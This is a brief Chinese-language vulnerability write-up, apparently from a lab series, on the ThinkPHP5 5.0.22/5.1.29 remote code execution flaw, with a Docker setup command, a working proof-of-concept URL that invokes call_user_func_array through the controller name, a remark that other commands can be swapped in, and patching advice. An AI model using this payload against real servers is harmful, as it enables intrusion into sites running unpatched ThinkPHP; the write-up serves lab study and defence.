5.24.3 RCE2

漏洞名称

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

漏洞等级

高级

漏洞危害

远程代码执行

漏洞检测方法

利用POC去试验是否存在该漏洞

漏洞利用方法

启动docker环境:

docker-compose up -d

然后修改URL中的参数,构造POC,成功执行命令

发送的数据包为:

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`

也可以执行其他命令,只需替换vars[0]的值即可

漏洞修复方案:

1,及时去thinkphp官网修补漏洞

2,更新到最新版

Last updated